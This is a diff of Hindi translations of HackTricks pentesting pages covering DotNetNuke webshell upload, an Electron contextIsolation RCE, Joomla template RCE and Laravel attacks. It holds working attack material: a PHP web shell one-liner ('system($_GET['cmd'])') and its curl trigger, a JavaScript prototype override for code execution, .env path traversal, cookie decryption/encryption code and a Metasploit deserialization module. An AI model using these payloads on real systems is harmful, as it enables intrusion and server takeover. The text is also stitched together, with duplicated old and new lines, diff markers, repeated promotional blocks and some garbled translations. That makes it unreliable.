**`asp`** या **`aspx`** जोड़ें और फिर **`/admin/file-management`** में एक **asp वेबशेल** अपलोड करें, उदाहरण के लिए `shell.asp`
**`asp`** या **`aspx`** जोड़ें और फिर **`/admin/file-management`** में एक **asp वेबशेल** अपलोड करें जिसे `shell.asp` नामक कहा जा सकता है
फिर **`/Portals/0/shell.asp`** पर जाकर अपने वेबशेल तक पहुंचें।
फिर **`/Portals/0/shell.asp`** तक पहुंचने के लिए अपने वेबशेल तक पहुंचें।
### विशेषाधिकार उन्नयन
आप **Potatoes** या **PrintSpoofer** का उपयोग करके **विशेषाधिकार उन्नयन** कर सकते हैं।&#x20;
आप **आलू** या **PrintSpoofer** का उपयोग करके **विशेषाधिकार उन्नयन** कर सकते हैं।&#x20;
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापन देखना चाहेंगे**? या क्या आप **पीईएएस के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहेंगे**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीईएएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीएस**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक पीईएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details>

View file

@ -1,22 +1,22 @@
# Electron contextIsolation RCE के माध्यम से Electron आंतरिक कोड के द्वारा
# Electron contextIsolation RCE के माध्यम से Electron आंतरिक कोड के माध्यम से RCE
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप एक **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **फॉलो** करें मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके**
</details>
## उदाहरण 1
उदाहरण [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41) से है
उदाहरण [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41) से।
"exit" घटना सुनने वाला लिस्टनर हमेशा आंतरिक कोड द्वारा सेट किया जाता है जब पृष्ठ लोडिंग शुरू होती है। यह घटना संचालन से पहले उत्पन्न होती है:
"exit" घटना सुनने वाला लिस्टनर हमेशा आंतरिक कोड द्वारा सेट किया जाता है जब पृष्ठ लोडिंग शुरू होता है। यह घटना नेविगेशन से ठीक पहले उत्पन्न होती है:
```javascript
process.on('exit', function (){
for (let p in cachedArchives) {
@ -31,19 +31,19 @@ cachedArchives[p].destroy()
https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/bin/events.js#L156-L231 -- अब मौजूद नहीं है
फिर यहा जाता है:
फिर यहा जाता है:
![](<../../../.gitbook/assets/image (647).png>)
जहां "self" नोड का प्रक्रिया ऑब्जेक्ट है:
जहां "self" Node की प्रक्रिया वस्तु है:
![](<../../../.gitbook/assets/image (652) (1).png>)
प्रक्रिया ऑब्जेक्ट में "require" फंक्शन के संदर्भ होते हैं:
प्रक्रिया वस्तु में "require" फ़ंक्शन को संदर्भ है:
```
process.mainModule.require
```
जैसा कि handler.call को process ऑब्जेक्ट प्राप्त होने जा रहा है, हम इसे अधिकारिक कोड चलाने के लिए अधिलेखित कर सकते हैं:
जैसे हैंडलर.call प्रक्रिया ऑब्जेक्ट प्राप्त करने जा रहा है, हम इसे अभिजात कोड निष्पादित करने के लिए अधिलेखित कर सकते हैं:
```html
<script>
Function.prototype.call = function(process){
@ -54,13 +54,13 @@ location.reload();//Trigger the "exit" event
```
## उदाहरण 2
**प्रोटोटाइप प्रदूषण से रिक्वायर ऑब्जेक्ट प्राप्त करें**। [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81) से।
**प्रोटोटाइप प्रदूषण से रिक्वायर ऑब्जेक्ट प्राप्त करें**। [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
लीक:
<figure><img src="../../../.gitbook/assets/image (34).png" alt=""><figcaption></figcaption></figure>
ोषण:
ात्रुता:
<figure><img src="../../../.gitbook/assets/image (35).png" alt=""><figcaption></figcaption></figure>
@ -68,10 +68,10 @@ location.reload();//Trigger the "exit" event
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर पर फॉलो** करें **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके**।
</details>

View file

@ -4,17 +4,17 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप PEASS के **नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram समूह**](https://t.me/peass) या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके**.
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs जमा करके।
</details>
### Joomla सांख्यिकी
### Joomla आंकड़े
Joomla कुछ अनाम [उपयोग सांख्यिकी](https://developer.joomla.org/about/stats.html) एकत्र करता है जैसे कि Joomla, PHP और डेटाबेस संस्करणों का विभाजन और Joomla स्थापनाओं पर उपयोग में सर्वर ऑपरेटिंग सिस्टम्स। इस डेटा को उनके सार्वजनिक [API](https://developer.joomla.org/about/stats/api.html) के माध्यम से पूछताछ की जा सकती है।
Joomla कुछ गैर-पहचानी [उपयोग आंकड़े](https://developer.joomla.org/about/stats.html) जमा करता है जैसे Joomla, PHP और डेटाबेस संस्करण और सर्वर ऑपरेटिंग सिस्टम का विवरण जो Joomla स्थापनाओं पर उपयोग में हैं। इस डेटा को उनके सार्वजनिक [API](https://developer.joomla.org/about/stats/api.html) के माध्यम से क्वेरी किया जा सकता है।
```bash
curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool
@ -42,17 +42,17 @@ curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool
}
}
```
## सूचीकरण
## जांचना
### खोज/फुटप्रिंटिंग
* **मेटा** की जाच करें
* **मेटा** की जाच करें
```bash
curl https://www.joomla.org/ | grep Joomla | grep generator
<meta name="generator" content="Joomla! - Open Source Content Management" />
```
* robots.txt
* रोबोट्स.टेक्स्ट
```
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
@ -73,10 +73,8 @@ curl https://www.joomla.org/ | grep Joomla | grep generator
### संस्करण
* **/administrator/manifests/files/joomla.xml** में आप संस्करण देख सकते हैं।
* **/language/en-GB/en-GB.xml** में आप Joomla का संस्करण प्राप्त कर सकते हैं।
* **plugins/system/cache/cache.xml** में आप एक अनुमानित संस्करण देख सकते हैं।
### स्वचालित
* **/language/en-GB/en-GB.xml** में जूमला का संस्करण प्राप्त कर सकते हैं।
* **plugins/system/cache/cache.xml** में लगभग संस्करण देख सकते हैं।
```bash
droopescan scan joomla --url http://joomla-site.local/
```
@ -90,23 +88,11 @@ admin:admin
```
## RCE
यदि आपने **admin credentials** प्राप्त कर लिए हैं, तो आप **RCE के अंदर** **PHP कोड** का एक टुकड़ा जोड़कर **RCE** प्राप्त कर सकते हैं। हम यह **template** को **customizing** करके कर सकते हैं।
यदि आपने **व्यवस्थापक क्रेडेंशियल्स** प्राप्त किए हैं तो आप **एक स्निपेट PHP कोड जोड़कर इसके अंदर RCE** कर सकते हैं। हम इसे **एक टेम्पलेट** को **कस्टमाइज़ करके** कर सकते हैं।
1. **`Templates`** पर **क्लिक करें** जो कि `Configuration` के नीचे बाईं ओर है, ताकि templates मेनू खुल जाए
2. किसी **template** नाम पर **क्लिक करें**। चलिए **`protostar`** को चुनते हैं जो कि `Template` कॉलम हेडर के नीचे है। इससे हम **`Templates: Customise`** पेज पर पहुंचेंगे
3. अंत में, आप किसी पेज पर क्लिक करके **page source** खोल सकते हैं। चलिए **`error.php`** पेज को चुनते हैं। हम निम्नलिखित के अनुसार **कोड निष्पादन प्राप्त करने के लिए PHP one-liner जोड़ेंगे**:
1. **`system($_GET['cmd']);`**
4. **सेव & क्लोज**
1. `Configuration` के नीचे **`Templates`** पर **`क्लिक`** करें ताकि टेम्पलेट मेनू खोलें
2. `Template` स्तंभ के तहत **`protostar`** का चयन करें। यह हमें **`Templates: Customise`** पृष्ठ पर ले जाएगा
3. अंततः, आप **पेज स्रोत** खोलने के लिए किसी पेज पर क्लिक कर सकते हैं। हम **`error.php`** पेज का चयन करेंगे। हम निम्नलिखित रूप में **PHP वन-लाइनर जोड़ें कोड एक्झीक्यूशन प्राप्त करने के लिए**:
1. **`system($_GET['cmd']);`**
4. **सहेजें और बंद करें**
5. `curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id`
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **cybersecurity company** में काम करते हैं? क्या आप चाहते हैं कि आपकी **company का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुंच चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा संग्रह विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) का।
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **hacktricks repo** में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
</details>

View file

@ -4,34 +4,34 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **फॉलो** करें मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापन देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details>
## Laravel ट्रिक्स
## Laravel Tricks
### डीबगिंग मोड
### Debugging mode
यदि Laravel **डीबगिंग मोड** में है, तो आपको **कोड** और **संवेदनशील डेटा** तक पहुंच मिलेगी।\
यदि Laravel **डीबगिंग मोड** में है तो आप **कोड** और **संवेदनशील डेटा** तक पहुंच सकेंगे।\
उदाहरण के लिए `http://127.0.0.1:8000/profiles`:
![](<../../.gitbook/assets/image (610).png>)
इसे आमतौर पर अन्य Laravel RCE CVEs को शोषण करने के लिए आवश्यक होता है।
यह आम तौर पर अन्य Laravel RCE CVEs का शोध करने के लिए आवश्यक होता है।
### .env
Laravel `.env` नामक एक फ़ाइल में उन APP को सहेजता है जिन्हें यह कुकीज़ और अन्य प्रमाणीकरण को एन्क्रिप्ट करने के लिए उपयोग करता है, जिसे कुछ पथ ट्रावर्सल का उपयोग करके पहुंचा जा सकता है: `/../.env`
Laravel एक फ़ाइल में सहेजता है जिसे `.env` कहा जाता है और जिसका उपयोग कुकी और अन्य क्रेडेंशियल को एन्क्रिप्ट करने के लिए करता है, जिसका पथ ट्रावर्सल का उपयोग करके पहुंचा जा सकता है: `/../.env`
Laravel इस जानकारी को डीबग पेज में भी दिखाएगा (जब Laravel कोई त्रुटि ढूंढ़ता है और यह सक्रिय होता है)।
Laravel इस जानकारी को डिबग पेज में भी दिखाएगा (जो लारावेल एक त्रुटि पाता है और यह सक्रिय होता है).
Laravel के गुप्त APP\_KEY का उपयोग करके आप कुकीज़ को डिक्रिप्ट और पुनः एन्क्रिप्ट कर सकते हैं:
लारावेल की गुप्त APP\_KEY का उपयोग करके आप कुकी को डिक्रिप्ट और पुनः एन्क्रिप्ट कर सकते हैं:
### कुकी डिक्रिप्ट करें
### Decrypt Cookie
```python
import os
import json
@ -92,12 +92,12 @@ encrypt(b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2
```
### Laravel डिसीरियलाइज़ेशन RCE
िकल्पशील संस्करण: 5.5.40 और 5.6.x से 5.6.29 तक ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))
ंलरेबल संस्करण: 5.5.40 और 5.6.x से 5.6.29 तक ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))
यहां आप डिसीरियलाइज़ेशन संकट के बारे में जानकारी पा सकते हैं: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)
यहाँ आप डिसीरियलाइज़ेशन वंलरेबिलिटी के बारे में जानकारी पा सकते हैं: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)
आप इसे टेस्ट और शोषण कर सकते हैं उपयोग करके [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\
या आप इसे मेटास्प्लोइट के साथ भी शोषण कर सकते हैं: `use unix/http/laravel_token_unserialize_exec`
आप इसे टेस्ट और एक्सप्लॉइट कर सकते हैं [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\
या आप इसे metasploit के साथ भी एक्सप्लॉइट कर सकते हैं: `use unix/http/laravel_token_unserialize_exec`
### CVE-2021-3129
@ -105,16 +105,16 @@ encrypt(b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2
### Laravel SQLInjection
इसके बारे में जानकारी यहा पढ़ें: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
इसके बारे में जानकारी यहा पढ़ें: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)**.
* पाएं [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
